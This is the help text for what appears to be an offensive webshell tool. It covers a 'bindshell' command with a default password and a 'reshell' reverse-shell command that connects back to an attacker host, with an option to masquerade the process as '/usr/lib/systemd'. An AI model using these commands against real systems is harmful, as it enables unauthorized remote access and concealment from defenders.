bind shell
Bind a port and wait for someone to connect to get a shell.
eg: bindshell {port=7777} {passwd=doughnuts}
Command Args:
--port [int] port (Default: 7777)
--passwd [str] passwd (Default: 'doughnuts')
reshell
Bind a port and wait for target connect back to get a full shell.
eg: reshell {lhost} {port} {type=[python|script|upload]{1|2|3},default = 0 (Python:1 Not Python:3)} {(Only for Mode 2) fakename=/usr/lib/systemd}
Command Args:
-l,--lhost(*) [str] lhost
-p,--port(*) [int] port
-m,--mode [int] mode (Default: 0)
-f,--fakename [str] fakename (Default: '/usr/lib/systemd')